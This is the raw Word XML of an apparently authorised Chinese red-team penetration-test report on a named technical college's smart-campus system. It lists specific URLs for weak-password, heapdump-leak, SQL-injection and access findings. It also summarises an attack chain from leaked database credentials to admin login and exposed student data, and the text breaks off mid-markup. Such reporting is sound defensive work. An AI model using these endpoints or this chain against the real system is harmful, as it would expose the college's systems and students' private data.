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2C2340D">
      <w:pPr>
        <w:pStyle w:val="style62"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>攻防演练安全隐患报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F53B62F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="0" w:name="_Toc5952"/>
    <w:bookmarkStart w:id="1" w:name="_Toc1611"/>
    <w:p w14:paraId="3980EC49">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:ind w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、综述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="21F583BD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:widowControl/>
        <w:kinsoku w:val="false"/>
        <w:autoSpaceDE w:val="false"/>
        <w:autoSpaceDN w:val="false"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>经过演习指挥部授权，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>攻击队</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>于2026年9月16日，对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>杭州第一技师学院</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>进行了渗透评估，通过模拟真实网络攻击行为，评估系统是否存在可以被攻击者利用的漏洞以及由此因此引发的风险大小，为制定相应的安全措施与解决方案提供实际的依据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CBAD9E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透结果总结汇总如下表：</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2172"/>
        <w:gridCol w:w="3665"/>
        <w:gridCol w:w="672"/>
      </w:tblGrid>
      <w:tr w14:paraId="43EDA1D3">
        <w:trPr>
          <w:trHeight w:val="521" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:val="clear" w:color="auto" w:fill="d9d9d9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AD07CF0">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing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渗透系统对象</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2172" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:val="clear" w:color="auto" w:fill="d9d9d9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B55C44C">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing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漏洞类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3665" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:val="clear" w:color="auto" w:fill="d9d9d9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="545891E4">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing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URL（可罗列）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:val="clear" w:color="auto" w:fill="d9d9d9"/>
          </w:tcPr>
          <w:p w14:paraId="64E1C273">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing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数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2A3A546A">
        <w:tblPrEx/>
        <w:trPr>
          <w:trHeight w:val="359" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E65F2A6">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智慧校园管理系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2172" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="781A795B">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弱口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3665" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p w14:paraId="2AAE9AF6">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>http://web.hzdyjsxy.cn:18080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>prod-api/actuator</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "https://dam.ygwjg.com/" \t "_blank" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="077B8F6F">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2108694A">
        <w:tblPrEx/>
        <w:trPr>
          <w:trHeight w:val="90" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AC53E1A">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智慧校园管理系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2172" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BEC2BE3">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堆栈泄漏</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3665" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p w14:paraId="4E5C5F08">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http://web.hzdyjsxy.cn:18080/prod-api/actuator/heapdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48B69F41">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="027A619E">
        <w:tblPrEx/>
        <w:trPr>
          <w:trHeight w:val="90" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ABC0C34">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智慧校园管理系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2172" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B2D1C4D">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SQL注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3665" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p w14:paraId="0CA3A804">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http://web.hzdyjsxy.cn:18080/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D71669C">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0B5F831E">
        <w:tblPrEx/>
        <w:trPr>
          <w:trHeight w:val="90" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BFF9017">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智慧校园管理系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2172" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="064783D9">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WEB系统权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3665" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p w14:paraId="0099DCE0">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http://web.hzdyjsxy.cn:18080/index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29BB23F7">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="006AC12B">
        <w:tblPrEx/>
        <w:trPr>
          <w:trHeight w:val="90" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A35C058">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智慧校园管理系统移动端</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2172" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B20D922">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WEB系统权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3665" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p w14:paraId="2636B163">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing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http://m.hzdyjsxy.cn:18080/#/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B3FFA1C">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A813C8E">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:ind w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、渗透分析过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:bookmarkStart w:id="2" w:name="_Toc129940287"/>
    <w:p w14:paraId="6AFCD453">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:widowControl/>
        <w:kinsoku w:val="false"/>
        <w:autoSpaceDE w:val="false"/>
        <w:autoSpaceDN w:val="false"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="楷体" w:cs="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="楷体" w:cs="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>（一）渗透路径说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="006A5719">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:widowControl/>
        <w:kinsoku w:val="false"/>
        <w:autoSpaceDE w:val="false"/>
        <w:autoSpaceDN w:val="false"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="960" w:firstLineChars="300"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1.actuator存在弱口令可获取heapdump堆栈信息，泄漏数据库连接账号密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C1B59">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:widowControl/>
        <w:kinsoku w:val="false"/>
        <w:autoSpaceDE w:val="false"/>
        <w:autoSpaceDN w:val="false"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="960" w:firstLineChars="300"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SQL注入获取管理员账号，结合泄漏的密码登录智慧校园成功，移动端也可登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D1E0D4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:widowControl/>
        <w:kinsoku w:val="false"/>
        <w:autoSpaceDE w:val="false"/>
        <w:autoSpaceDN w:val="false"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="960" w:firstLineChars="300"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:eastAsia="仿宋"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>数据库存在学生敏感信息泄漏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAAEC8A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:widowControl/>
        <w:kinsoku w:val="false"/>
        <w:autoSpaceDE w:val="false"/>
        <w:autoSpaceDN w:val="false"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="960" w:firstLineChars="300"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:eastAsia="仿宋"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374118DA">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:ind w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、渗透成果说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5763338E">
      <w:pPr>
        <w:pStyle w:val="style2"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（一）风险状况概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BDB457">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>http://web.hzdyjsxy.cn:18080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBC3AB4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统所属单位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杭州第一技师学院</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23250813">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测时间：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB37DF8">
      <w:pPr>
        <w:pStyle w:val="style2"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（二）系统漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="3" w:name="u91f4b7b5"/>
    <w:bookmarkStart w:id="4" w:name="NeQmT"/>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="26F46E5C">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>证明</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="5" w:name="u953a7ac9"/>
    <w:bookmarkStart w:id="6" w:name="u29194849"/>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="0A3A7C0B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5824855" cy="372745"/>
            <wp:effectExtent l="0" t="0" r="17145" b="8255"/>
            <wp:docPr id="1026"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2" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5824855" cy="372745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:bookmarkStart w:id="7" w:name="u58846180"/>
    <w:bookmarkEnd w:id="6"/>
    <w:p w14:paraId="00B56374">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
